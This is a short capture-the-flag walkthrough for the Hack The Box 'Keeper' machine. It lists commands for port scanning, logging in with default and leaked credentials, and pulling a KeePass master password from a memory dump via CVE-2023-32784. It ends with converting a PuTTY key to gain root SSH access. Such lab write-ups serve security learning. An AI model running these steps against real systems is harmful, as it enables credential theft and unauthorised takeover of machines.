Keeper - Hack The Box
Reconnaissance
- Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.10.11.227
- Add domain to local DNS
echo "10.10.11.227 tickets.keeper.htb" >> /etc/hosts
Exploitation
- Request Tracker default credentials
root password
- Leaked credentials
- Conect to ssh
ssh 10.10.11.227 -l lnorgaard
Post-exploitation
- Extract Keepass dump (CVE-2023-32784)
scp lnorgaard@10.10.11.227:/home/lnorgaard/RT30000.zip .
7z x RT30000.zip
https://github.com/vdohney/keepass-password-dumper
dotnet run ../KeePassDumpFull.dmp
- Read kdbx database file
keepassxc ../passcodes.kdbx
- Create ssh private key with PuTTY-User-Key-File
puttygen pass.ppk -O private-openssh -o id_rsa
ssh -i id_rsa root@10.10.11.227
